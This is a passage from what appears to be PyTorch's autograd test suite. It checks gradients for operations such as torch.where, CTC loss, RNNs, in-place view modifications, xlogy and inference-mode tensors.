cond = mask_not_all_zeros((5, 5)).to(device=device)
def where(cond, x, y):
return torch.where(cond, x, y)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)])
x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)])
def test_where_scalar(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
scalar = 4.
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where_scalar_first(cond, x):
return torch.where(cond, scalar, x)
def where_scalar_second(cond, x):
return torch.where(cond, x, scalar)
gradcheck(where_scalar_first, (cond, x))
gradgradcheck(where_scalar_first, (cond, x))
gradcheck(where_scalar_second, (cond, x))
gradgradcheck(where_scalar_second, (cond, x))
@skipCUDAIf(True, """Test is flaky on Linux and Windows, typical error message:
https://github.com/pytorch/pytorch/issues/34870""")
def test_ctc_loss(self, device):
batch_size = 64
num_labels = 101
target_length = 15
gradcheck_input_size = 10
ZERO_NONE = 0
ZERO_SOME = 1
ZERO_ALL = 2
# input_length, vary_lengths, zero_lengths
tests = [(150, False, ZERO_NONE),
(150, True, ZERO_NONE),
(50, True, ZERO_SOME),
(50, True, ZERO_ALL)]
if 'cuda' in device:
tests += [(50, False, ZERO_NONE),
(50, True, ZERO_NONE),
(150, True, ZERO_SOME),
(150, True, ZERO_ALL)]
for input_length, vary_lengths, zero_mode in tests:
targets = torch.randint(1, num_labels, (batch_size, target_length),
device=device, dtype=torch.long)
x = torch.randn(gradcheck_input_size, dtype=torch.double, device=device, requires_grad=True)
tile_factors = torch.randn(input_length * batch_size * num_labels // gradcheck_input_size + 1,
device=device)
input_lengths = [(torch.randint(input_length // 2, input_length + 1, ()).item()
if vary_lengths or i == 0 else input_length) for i in range(batch_size)]
if zero_mode == ZERO_ALL:
target_lengths = [0 for _ in range(batch_size)]
else:
target_lengths = [(torch.randint(target_length // 2, target_length + 1, ()).item()
if vary_lengths else target_length) for _ in range(batch_size)]
if zero_mode == ZERO_SOME:
idxes = torch.randint(0, batch_size, (10,))
for i in idxes:
target_lengths[i] = 0
def ctc_after_softmax(x):
x_full = ((x[:, None] * tile_factors[None, :]).view(-1)[:input_length * batch_size * num_labels]
.view(input_length, batch_size, num_labels))
log_probs = torch.log_softmax(x_full, 2)
return torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)
gradcheck(ctc_after_softmax, [x])
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfCudnnVersionLessThan(7600)
def test_ctc_loss_cudnn(self, device):
batch_size = 16
input_length = 30
num_labels = 101
target_length = 15
targets = torch.randint(1, num_labels, (batch_size * target_length,),
device='cuda', dtype=torch.long)
log_probs = torch.log_softmax(torch.randn(input_length, batch_size, num_labels, device='cuda', dtype=torch.float), 2)
log_probs.requires_grad_()
input_lengths = batch_size * [input_length]
target_lengths = batch_size * [target_length]
grad_out = torch.randn(batch_size, device='cuda', dtype=torch.float)
with torch.backends.cudnn.flags(enabled=False):
loss_native = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none')
grad_native, = torch.autograd.grad(loss_native, log_probs, grad_out)
loss_cudnn = torch.nn.functional.ctc_loss(log_probs, targets.to('cpu', torch.int32),
input_lengths, target_lengths, reduction='none')
self.assertTrue("Cudnn" in str(loss_cudnn.grad_fn))
grad_cudnn, = torch.autograd.grad(loss_cudnn, log_probs, grad_out)
self.assertEqual(grad_cudnn, grad_native, atol=1e-4, rtol=0)
def test_leaky_relu_inplace_with_neg_slope(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), -2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.rrelu_(a.clone(), -5.0, 1.0)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
def test_leaky_relu_inplace_with_zero_slope(self, device):
a = torch.tensor([-2., 0., 2.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), 0.0)
b.backward(torch.ones(3, device=device))
expected = torch.tensor([0., 0., 1.], device=device)
self.assertEqual(a.grad, expected)
@onlyOnCPUAndCUDA
def test_elu_inplace_with_neg_alpha(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.elu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.celu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
@onlyCUDA
def test_free_unneeded_tensor(self, device):
x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True)
m = torch.randn(1, 3, 1, 1, device=device)
z = x.sum()
base_mem = torch.cuda.memory_allocated()
z = ((x + 2) * m).sum()
end_mem = torch.cuda.memory_allocated()
# In the end the memory usage should remain equal, because neither of
# (x + 2) and ((x + 2) * m) should be kept alive for backward, while the
# previous allocation of z had the same size as the current one.
self.assertEqual(base_mem, end_mem)
@onlyCUDA
def test_pin_memory(self, device):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
self.assertEqual(x, x.pin_memory())
self.assertIsNot(x, x.pin_memory())
self.assertTrue(x.pin_memory().requires_grad)
gradcheck(lambda x: x.pin_memory(), [x])
gradgradcheck(lambda x: x.pin_memory(), [x])
@skipCUDAIfRocm
@onlyCUDA
def test_profiler_emit_nvtx(self, device):
# This test is not intended to ensure correctness of nvtx ranges.
# That would require something a great deal more complex (you'd have to create a
# profile in a subprocess, open it, and parse the sql somehow).
# This test is merely intended to catch if emit_nvtx breaks on construction.
a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
with torch.cuda.profiler.profile():
with emit_nvtx():
a.add(1.0)
@onlyCUDA
def test_rnn_backward_to_input_but_not_parameters(self, device):
# this checks whether it is possible to not require
# weight parameters, but require inputs, see #7722
l = torch.nn.LSTM(2, 3).to(device)
for p in l.parameters():
p.requires_grad = False
s = torch.randn(1, 1, 2, requires_grad=True, device=device)
out, _ = l(s)
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
@onlyCUDA
def test_lstmcell_backward_only_one_output_grad(self, device):
# checks that undefined gradients doen't hamper the backward
# see #11872
l = torch.nn.LSTMCell(2, 3).to(device).double()
s = torch.randn(1, 2, device=device, dtype=torch.double, requires_grad=True)
for i in range(2):
out = l(s)[i]
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
def _test_rnn_mod(self, mod, inp):
def flatten_out(mod, inp):
out = mod(inp)
return tuple([t if isinstance(t, torch.Tensor) else tt for t in out for tt in t])
gradcheckfunc = partial(flatten_out, mod)
with torch.backends.cudnn.flags(enabled=False):
gradcheck(gradcheckfunc, inp, check_batched_grad=False)
gradgradcheck(gradcheckfunc, inp, check_batched_grad=False)
if inp.is_cuda and not TEST_WITH_ROCM:
# Assert that we have good error message around unsupported CuDNN double backward
# NB: we trigger double backward using .backward() instead of autograd.grad due to
# https://github.com/pytorch/pytorch/issues/37874
with torch.backends.cudnn.flags(enabled=True):
result = gradcheckfunc(inp)
result[0].sum().backward(create_graph=True)
grad0 = next(mod.parameters()).grad
with self.assertRaisesRegex(RuntimeError,
"please disable the CuDNN backend temporarily"):
grad0.sum().backward()
# Here we avoid the backward(create_graph=True) memory leak
# described in https://github.com/pytorch/pytorch/issues/7343
for param in mod.parameters():
param.grad = None
inp.grad = None
@skipMeta # LSTM cell reuses output which was resized
def test_LSTM_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.LSTM(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
@skipMeta # GRU cell reuses output which was resized
def test_GRU_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.GRU(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
def test_copysign_subgradient(self, device):
# Input is 0.0
x = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Input is -0.0
x = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is 0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [-1.0, 0.0, 1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is -0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [1.0, 0.0, -1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
@deviceCountAtLeast(1)
def test_grad_assignment(self, devices):
x = torch.randn(5, 5, device=devices[0])
# Tests that the wrong shape raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(2, 2, device=devices[0])
# Tests that the wrong dtype raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0])
# Tests that self-assignment raises
with self.assertRaises(RuntimeError):
x.grad = x
# Tests device -> cpu grad assignment raises
if self.device_type != 'cpu':
with self.assertRaises(RuntimeError):
t_cpu = torch.rand(5, 5)
t_cpu.grad = torch.randn(5, 5, device=devices[0])
# Tests half type on CUDA
if self.device_type == 'cuda':
x = x.to(dtype=torch.half, device=devices[0])
x.grad = torch.zeros_like(x)
# Tests cross-device assignment raises
if len(devices) > 1:
x = torch.randn(5, 5, device=devices[0])
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, device=devices[1])
@deviceCountAtLeast(1)
@dtypes(torch.float, torch.double)
def test_requires_grad_factory(self, devices, dtype):
fns = [torch.ones_like, torch.testing.randn_like]
x = torch.randn(2, 3, dtype=dtype, device=devices[0])
for fn in fns:
for requires_grad in [True, False]:
output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad)
self.assertEqual(requires_grad, output.requires_grad)
self.assertIs(dtype, output.dtype)
self.assertEqual(devices[0], str(x.device))
@deviceCountAtLeast(2)
def test_unused_output_device(self, devices):
from torch.nn.parallel._functions import Broadcast
x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True)
outputs = Broadcast.apply(list(range(len(devices))), x)
y = outputs[-1] * 2
y.sum().backward()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2)
@deviceCountAtLeast(2)
def test_backward_device(self, devices):
# check that current device matches the variable's device
device = [None]
class Identity(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.clone()
@staticmethod
def backward(ctx, grad_output):
device[0] = grad_output.device
return grad_output.clone()
v = torch.randn(1, device=devices[1], requires_grad=True)
Identity.apply(v).backward()
self.assertEqual(str(device[0]), devices[1])
@deviceCountAtLeast(2)
def test_inputbuffer_add_multidevice(self, devices):
input = torch.randn(1, device=devices[0], requires_grad=True)
output = input.to(device=devices[1]) + input.to(device=devices[1])
output.backward()
@onlyCPU
def test_copy_(self, device):
# At the time of writing this test, copy_ is not generated from native_functions.yaml
# there was a bug that bfloat16 was not recognized as floating.
x = torch.randn(10, device=device, requires_grad=True)
floating_dt = [dt for dt in torch.testing.get_all_dtypes() if dt.is_floating_point]
for dt in floating_dt:
y = torch.empty(10, device=device, dtype=dt)
y.copy_(x)
self.assertTrue(y.requires_grad)
z = x.to(torch.bfloat16)
self.assertTrue(z.requires_grad)
@onlyCUDA
def test_simple_reentrant_cross_device(self, device):
class ReentrantFunc(Function):
_cpu_mode = True
@staticmethod
def forward(ctx, x):
return x * (x + 2)
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
if ReentrantFunc._cpu_mode:
new_param = torch.randn(2, 2, requires_grad=True)
(new_param ** 2).sum().backward()
else:
new_param = torch.randn(2, 2, device=device, requires_grad=True)
(new_param ** 2).sum().backward()
return grad_output
# Reentrant starts on GPU thread, finishs on GPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on CPU thread, finishs on GPU thread
x = torch.randn(2, 2, requires_grad=True)
# set ReentrantFunc node to GPU to emit tasks to GPU queue
ReentrantFunc._cpu_mode = False
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on GPU thread, finishs on CPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
# set ReentrantFunc node to CPU to emit tasks to CPU queue
ReentrantFunc._cpu_mode = True
out = ReentrantFunc.apply(x)
out.sum().backward()
@onlyCUDA
def test_cross_device_reentrant_autograd(self, device):
# Output on gpu so that this task will be associated with the gpu thread
def fn_on_gpu(inp):
# Artificially increase the priority of the next op to make sure it runs
# as soon as we reach it before the ops of branch1.
dummy = inp * 2 * 2 * 2 * 2
return inp.to(device=device)
def parent_on_cpu(inp):
# Slow branch of ops on gpu so that the work queue for the gpu thread
# won't empty too quickly. They also have smaller priorities than the
# ones created by fn_on_gpu
branch1 = inp.to(device=device)
branch1 = branch1 / branch1
branch1 = branch1 / branch1
branch1 = branch1 / branch1
# Perform checkpoint on cpu tensors. So the last op performed in the reentrant
# autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
# So the cpu thread will notify the gpu thread with an empty NodeTask.
branch2 = checkpoint(fn_on_gpu, inp)
out = branch2 + branch1
return out
inp = torch.rand(2, requires_grad=True)
out = parent_on_cpu(inp)
# This will segfault if the empty NodeTask is not handled properly in the
# gpu thread ReadyQueue
out.sum().backward()
def test_inplace_on_view_backprop_base(self, device):
# modify view and back-prop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v1.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [1, 1]])
def test_inplace_on_view_backprop_view_of_view(self, device):
# modify view and backprop through view-of-view
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = x.narrow(0, 0, 1)
v1.mul_(2)
v2.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]])
def test_inplace_on_view_of_view(self, device):
# modify view-of-view and backprop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]])
def test_inplace_on_view_then_no_grad(self, device):
# Perform an in-place operation on a view of a non-leaf variable.
a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True)
b = a * 2
c = b.view_as(b)
c[0][0] = 3
# Force a graph update with grad disabled.
with torch.no_grad():
c.grad_fn
c.sum().backward()
def test_inplace_on_view_gradcheck(self, device):
# gradcheck modifications to views
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b)
x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_multiple_outputs(self, device):
root = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_()
x = root.clone()
v1 = x.unbind()
with self.assertRaises(RuntimeError):
v1[0].mul_(2)
def test_inplace_on_view_of_multiple_output_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.unbind(0)
c = b[0].view_as(b[0])
with self.assertRaises(RuntimeError):
c.mul_(2)
def test_inplace_multiple_output_view_of_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.view_as(a)
c = b.unbind(0)
with self.assertRaises(RuntimeError):
c[0].mul_(2)
def test_inplace_on_view_makes_base_require_grad(self, device):
# in-place modification to view makes base require grad
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False)
b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
self.assertFalse(x.requires_grad)
x.narrow(1, 2, 2).mul_(b)
self.assertTrue(x.requires_grad)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_backprop_view(self, device):
# modify view and backprop through view
a = torch.tensor([2., 5.], device=device, requires_grad=False)
b = torch.tensor([3.], device=device, requires_grad=True)
res = a.narrow(0, 1, 1).mul_(b)
res.sum().backward()
self.assertEqual(b.grad.tolist(), [5])
self.assertIsNone(a.grad)
def test_inplace_on_view_modify_base(self, device):
# Test that an in-place operation on a base that forced it to require
# grad also forces any previous views to require grad and backprop
# correctly
r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True)
def fn(r):
x = torch.ones(5, dtype=torch.double, device=device)
v = x.select(0, 1)
self.assertFalse(v.requires_grad)
self.assertIsNone(v.grad_fn)
x.add_(r) # v is now dependent on r due to the in-place op on x
self.assertTrue(v.requires_grad)
return v
gradcheck(fn, [r])
gradgradcheck(fn, [r])
def test_inplace_on_view_python(self, device):
# in-place modifications of Python-autograd created view
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
class PyAdd(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y):
ctx.mark_dirty(x)
x.add_(y)
return x
@staticmethod
def backward(ctx, grad):
return grad, grad
def func(root, b):
x = root.clone()
PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b)
PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_non_contig(self, device):
root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]])
def test_inplace_on_view_multi_output_unsafe(self, device):
for f in [lambda t: t.unsafe_split(1),
lambda t: t.unsafe_split_with_sizes((1, 1, 1)),
lambda t: t.unsafe_chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
s1.mul_(s2)
s1.sum().backward()
def test_inplace_on_view_multi_output_safe(self, device):
for f in [lambda t: t.split(1),
lambda t: t.split_with_sizes((1, 1, 1)),
lambda t: t.chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
error_msg = 'This view is the output of a function that returns multiple views.'
with self.assertRaisesRegex(RuntimeError, error_msg):
s1.mul_(s2)
def test_mv_grad_stride_0(self, device):
# Reference: https://github.com/pytorch/pytorch/issues/38315
mat = torch.randn(2, 2, dtype=torch.double, device=device)
vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True)
def fn(vec):
# Expand inside the function to make sure the input to
# gradcheck does not have overlapping memory
vec = vec.expand(2)
return (mat @ vec).sum()
gradcheck(fn, (vec))
gradgradcheck(fn, (vec))
@onlyCUDA
def test_gradcheck_input_output_different_device(self, device):
x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True)
gradcheck(lambda x: x.to("cpu"), (x,))
x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True)
gradcheck(lambda x: x.to("cuda"), (x,))
# TODO: see if this can be OpInfo'd or moved to test_reductions.py
def test_logcumsumexp_large_value(self, device):
a = torch.rand(4, 4, 4, dtype=torch.double, requires_grad=True)
with torch.no_grad():
# Large Number
a[0] = 10000
gradcheck(lambda x: x.logcumsumexp(0), a)
gradgradcheck(lambda x: x.logcumsumexp(0), a)
gradcheck(lambda x: x.logcumsumexp(1), a)
gradgradcheck(lambda x: x.logcumsumexp(1), a)
gradcheck(lambda x: x.logcumsumexp(2), a)
gradgradcheck(lambda x: x.logcumsumexp(2), a)
def test_strided_leaf_grad_layout(self, device):
# (1) If leaf is non-overlapping and dense, grad's layout should match its leaf.
for fmt_a in (torch.contiguous_format, torch.channels_last):
for fmt_b in (torch.contiguous_format, torch.channels_last):
a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a)
b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b)
a.requires_grad_()
b.requires_grad_()
# checks (1) for broadcasted gradients
a.sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
b.sum().backward()
self.assertEqual(b.grad.stride(), b.stride())
# checks (1) for non-broadcasted gradients
a.grad = None
b.grad = None
(a * b).sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
self.assertEqual(b.grad.stride(), b.stride())
# (2) If leaf isn't dense, checks that grads are rowmajor contiguous.
c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device))
c.requires_grad_()
d = torch.rand((2, 2), device=device)
# checks (2) for broadcasted gradients
c.sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# checks (2) for non-broadcasted gradients
c.grad = None
(c * d).sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# TODO: OpInfo this or move to atleast's test suite
def _test_atleast(self, device, torch_fn):
# 0-dim
s = torch.tensor(0.5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), s)
gradgradcheck(lambda x: torch_fn(x), s)
# 1-dim
a = torch.rand(4, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), a)
gradgradcheck(lambda x: torch_fn(x), a)
# 2,3,4-dim
b = torch.rand(4, 3, dtype=torch.double, requires_grad=True)
c = torch.rand(4, 3, 2, dtype=torch.double, requires_grad=True)
d = torch.rand(4, 3, 2, 1, dtype=torch.double, requires_grad=True)
input_tuple = (s, a, b, c, d)
gradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
gradgradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
def test_atleast(self, device):
self._test_atleast(device, torch.atleast_1d)
self._test_atleast(device, torch.atleast_2d)
self._test_atleast(device, torch.atleast_3d)
# TODO: opinfo this or move to test_binary_ufuncs.py
def test_xlogy(self, device):
def _tensor_tensor_helper(x, y):
gradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
gradgradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
with torch.no_grad():
x = x.clone()
x[torch.rand_like(x) > 0.5] = 0
gradcheck(lambda y: torch.xlogy(x, y), (y))
gradgradcheck(lambda y: torch.xlogy(x, y), (y))
shapes = ((4,), (1, 4), (1, 1, 4), (1, 1, 1, 4))
# For broadcastible shapes and scalar.
for x_shape, y_shape in permutations(shapes, 2):
x = torch.rand(*x_shape, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(*y_shape, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
gradcheck(lambda y: torch.xlogy(0, y), (y))
gradgradcheck(lambda y: torch.xlogy(0, y), (y))
gradcheck(lambda y: torch.xlogy(2, y), (y))
gradgradcheck(lambda y: torch.xlogy(2, y), (y))
gradcheck(lambda y: torch.xlogy(y, 2), (y))
gradgradcheck(lambda y: torch.xlogy(y, 2), (y))
# Different shape
x = torch.rand(2, 3, 4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
# Same shape
x = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
class TestAutogradInferenceMode(TestCase):
def _is_inference_tensor(self, tensor):
try:
err_msg = "Inference tensors do not track version counter"
with self.assertRaisesRegex(RuntimeError, err_msg):
tensor._version
return True
except AssertionError as e:
return False
def test_inference_mode_context_manager(self):
self.assertFalse(torch.is_inference_mode_enabled())
with torch.inference_mode():
self.assertTrue(torch.is_inference_mode_enabled())
with torch.inference_mode(False):
self.assertFalse(torch.is_inference_mode_enabled())
self.assertTrue(torch.is_inference_mode_enabled())
self.assertFalse(torch.is_inference_mode_enabled())
def test_inference_mode_decorator(self):
@torch.inference_mode()
def func(x):
self.assertTrue(torch.is_inference_mode_enabled())
return x * x
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
d = func(c)
self.assertTrue(torch.is_inference(d))
self.assertFalse(d.requires_grad)
def test_inference_mode_tensor_creation(self):
with torch.inference_mode():
# new tensors created through constructors are inference tensors
c = torch.ones(1, 2, 3)
self.assertFalse(c.requires_grad)
self.assertTrue(torch.is_inference(c))
# requires_grad doesn't change inference tensor behavior in InferenceMode
tmp = torch.ones(1, 2, 3, requires_grad=True)
self.assertTrue(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
tmp = torch.ones(1, 2, 3).requires_grad_(False)
self.assertFalse(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
def test_inference_mode_existing_autograd_session(self):
s = torch.ones(1, 2, 3, requires_grad=True)
a = s.clone()
# `a` gets saved outside of inference mode
out = a * a
with torch.inference_mode():
a.add_(2)
self.assertFalse(torch.is_inference(a))
# tensors created outside of inference mode aren't
# inference tensors, so they will still have their
# version counters tracked
err_msg = ("one of the variables needed for gradient computation has been "
"modified by an inplace operation")
with self.assertRaisesRegex(RuntimeError, err_msg):
out.backward(torch.ones_like(out))
def test_inference_mode_inf_tensor_in_inf_mode_functional_op(self):
def functional_op(x):
return x * x
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# performing a non-view operation produces a inference tensor
# that does not require grad
func_out = functional_op(c)
self.assertTrue(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
def test_inference_mode_inf_tensor_in_inf_mode_inplace_op(self):
@torch.inference_mode()
def run_test(fn):
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# after performing inplace operation, tensor is still
# an inference tensor
fn(c)
self.assertTrue(torch.is_inference(c))
self.assertEqual(c.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_inf_mode_view_op(self):
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# perform view operation produces inference tensor
# that does not require grad
view_out = c.view(-1)
self.assertTrue(torch.is_inference(view_out))
self.assertFalse(view_out.requires_grad)
def test_inference_mode_inf_tensor_in_normal_mode_functional_op(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
func_out = functional_op(c)
self.assertFalse(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
self.assertTrue(func_out.is_leaf)
def test_inference_mode_inf_tensor_in_normal_mode_inplace_op(self):
def run_test(fn):
for requires_grad in (False, True):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
if requires_grad:
# leaf variable that requires grad is being used in an inplace
# operation when requires_grad=True
pass
else:
err_msg = "Inplace update to inference tensor outside InferenceMode"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(c)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_normal_mode_view_op(self):
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
out = c.view(-1)
self.assertTrue(torch.is_inference(out))
self.assertFalse(out.requires_grad)
self.assertFalse(out._is_view())
self.assertTrue(out.is_leaf)
def test_normal_tensor_inplace_output_in_inference_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
